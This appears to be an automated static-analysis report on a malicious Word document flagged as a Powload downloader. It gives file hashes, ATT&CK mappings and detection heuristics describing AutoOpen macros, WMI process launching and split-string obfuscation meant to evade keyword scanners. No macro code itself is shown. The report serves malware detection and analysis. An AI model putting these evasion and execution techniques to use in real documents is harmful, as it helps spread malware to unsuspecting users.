Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3af5d55a42781a34…

MALICIOUS

Office (OLE)

Size: 199.6 KB | Created: 2019-04-29 12:52:00 | Authoring application: Microsoft Office Word | First seen: 2020-02-04
MD5: a8ca03f4c424fbb885245e1d250464f4 | SHA-1: 0f80eebce1c846ca2969c4103ded1f31bd1ff2f3 | SHA-256: 3af5d55a42781a34d9ce0abdab4ccec19cc5cd606a67c4d0139c491d9d5b1b42
Risk Score: 342

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample contains VBA macros with an autoopen subroutine, a common technique for executing malicious code as soon as the document is opened. The heuristics indicate the use of GetObject and CreateObject to create a process through the WMI Win32_Process class, a technique often used to download and execute further payloads. The ClamAV detection name 'Doc.Downloader.Powload' further supports this assessment.

Heuristics (9)

  • ClamAV: Doc.Downloader.Powload-6958023-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6958023-0
  • VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 44777 bytes
SHA-256: ef881939909966ed56cde70950eb7ec776e519d3693014daf84ce6c7237e45be
Preview script
First 1,000 lines of the extracted script